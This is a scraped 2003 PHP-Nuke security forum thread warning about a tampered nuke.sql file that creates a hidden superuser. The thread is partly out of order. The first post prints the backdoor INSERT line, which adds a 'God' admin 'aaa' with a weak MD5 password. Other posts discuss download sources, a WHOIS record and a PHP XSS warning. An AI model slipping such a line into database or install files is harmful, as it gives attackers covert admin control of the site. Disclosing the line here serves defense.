You are missing our premiere tool bar navigation system! Register and use it for FREE!


Author: ulissesnelsonPostPosted: Mon Jul 21, 2003 2:50 am    Post subject:

iD LIKE by first Job..(site almost ready,waiting mikem answer ) Get NUKE REPORT into the patrol of (unficial) Nuke Sites.

and my sugestion its,why the nuke files can be only autorized to be downloaded from official nuke sites
like nuke cops,phpnuke ,we can created a standart image,sayng that its a secure web site...
what u think?

Author: luchtzakPostPosted: Mon Jul 21, 2003 2:52 am    Post subject:

I allready had a phpnuke 6.7 version and in the sql-file they had added a link to their website so you would get:

Web site engine's code is Copyright 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license

URL of that website

Be carefull what you download! I think it can be easy to install something on it to track your website etc...

Author: foxyfemfemLocation: USAPostPosted: Mon Jul 21, 2003 3:09 am    Post subject:

Hello,

Quoting the Security Alert Message on the mainpage
NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 

Author: chatservLocation: Puerto RicoPostPosted: Sun Jul 20, 2003 5:53 pm    Post subject:

Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

Author: RavenLocation: USAPostPosted: Sun Jul 20, 2003 6:03 pm    Post subject:

Interesting turn of events, isn't it. The question is hotly debated as to what $10 will buy you. Hmmm.

Author: MikeMilesPostPosted: Mon Jul 21, 2003 1:02 am    Post subject:

Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 308 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Alert - Altered nuke.sql file being circulated gives admin Alert - Altered nuke.sql file being circulated gives admin
Goto page 1, 2, 3, 4  Next  :| |:
Nuke Cops -> Nuke Security

Author: SpankedMonkey PostPosted: Sun Jul 20, 2003 3:34 pm    Post subject: Alert - Altered nuke.sql file being circulated gives admin

I downloaded a copy of nuke 6.8 on monday, after installing it on my site and loading the database I was unable to create an admin account. A very nice nukecop staff member offered to debug it and found that I had already created an account name aaa. Now this happened on 2 other databases that I loaded and I know I didn't create an account by accident 3 times, so I checked the other DB's and found they too had a GOD account created as aaa. Now, I decided to act on a hunch and search the nuke.sql for aaa.

I found this:

Code:
 INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '');



I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.

So all I can say is be very careful where you get your downloads and be aware that this is in circulation.
chatserv wrote:
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

Even then you have to be on your guard. I came across one of the established Nuke sites advertising a hacker's security fix on their front page which you all caught as bogus. I had to tell them to remove it. I won't post which one it was, but I'll say many sites just don't check things out.
Quote:
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.


Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?

Author: MikeMiles PostPosted: Mon Jul 21, 2003 3:51 am    Post subject:

Quote:
Did I miss something here?


Apparently so. The FAQ is a word-for-word rip off from the main site. Like you I don't see any link for downloading, but it could have been changed or maybe the wrong URL was posted.

Anyway, this is the registration of the site you think is legit looking. Missing a few details wouldn't you say?

WhoIs Results for nukephp.org

Contact Type Registrant
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Administrative
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Billing
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Technical
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Other Information
created-by: 5065-EN
created-date:
nameserver: dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

registrar: 5065-EN
registration-expiration-date:
status:
updated-by: 5065-EN
updated-date:

Author: RavenLocation: USA PostPosted: Mon Jul 21, 2003 3:59 am    Post subject:

foxyfemfem wrote:
Hello,

Quoting the Security Alert Message on the mainpage
Quote:
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.


Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?

You cannot download v6.8 from phpnuke.org without being a member of the Club, so he did not d/l it from there.

Author: SpankedMonkey PostPosted: Mon Jul 21, 2003 6:46 am    Post subject: Re: Alert - Altered nuke.sql file being circulated gives adm

As I said above:

Quote:
I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.



I want to say that I did get it from a link off of nukephp.org but I can not be sure, I thought I did. The link said that it required no registration also.

When I get home from work, I will see if there is anything else I can do to see where I got the download.

Author: Zhen-Xjell PostPosted: Mon Jul 21, 2003 6:50 am    Post subject:

Running analzyer will show you who the admins are of php-nuke and the phpbb2 forums. You can, as I often do, run it for a quick visual check of any changes.

Author: StyleeLocation: USA PostPosted: Tue Jul 22, 2003 4:56 pm    Post subject: Re: Alert - Altered nuke.sql file being circulated gives adm

Where do you get the analyzer from?

Author: Zhen-Xjell PostPosted: Tue Jul 22, 2003 5:33 pm    Post subject:

Hi, right on our front page.

Author: StyleeLocation: USA PostPosted: Tue Jul 22, 2003 6:46 pm    Post subject: Re: Alert - Altered nuke.sql file being circulated gives adm

Thank you.

Author: StyleeLocation: USA PostPosted: Tue Jul 22, 2003 7:46 pm    Post subject: Re: Alert - Altered nuke.sql file being circulated gives adm

Ok, I got warnings big time, I was able to fix alot of them simply. but this is the part that I am not sure about.

I got this
-------
WARNING! WARNING! WARNING! Vulnerable PHP On Your Server!
PHP Version Reason For Vulnerability
4.3.1 Your Server may be vulnerable to Cross-site Scripting in PHP's Transparent Session ID Support. Versions prior to 4.3.2 are affected. Tell your host to read the SecurityFocus report by clicking --> here. Until that is resolved, PHP-Nuke should be the least of your worries.

AFFECTED VERSIONS: Constraints
4.3.0 and 4.3.1 with php.ini containing session.use_trans_sid=1
4.2.0 to 4.2.3 without php.ini, or with php.ini containing session.use_trans_sid=1(php.ini-dist and php.ini-recommended from the PHP source distribution had use_trans_sid=1 from 4.2.0 to 4.2.2, and use_trans_sid=0 for 4.2.3 and later versions.)
prior to 4.2.0 compiled with --enable-trans-sid and with session.use_trans_sid=1

FIXED VERSIONS: Suggestion
4.3.2 or later Backup your system and upgrade PHP, also read the article at SecurityFocus. Solution 1 from Security Focus: Click, Solution 2 from thathost: Click. Solution 1 suggests the use of mod_security, which is an Apache module discussed at Nuke Cops: Here

Does this meant that this will be resolved if I update to nule 4.3.2?
How do I tell what version that I am on. I am using PHPNuke 6.7



Nuke Cops -> Nuke Security

All times are GMT - 8 Hours

Goto page 1, 2, 3, 4  Next  :| |:
Page 1 of 4

Powered by phpBB © 2001,2002 phpBB Group
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.045 Seconds - 207 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
added by Evaders - DO NOT REMOVE
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::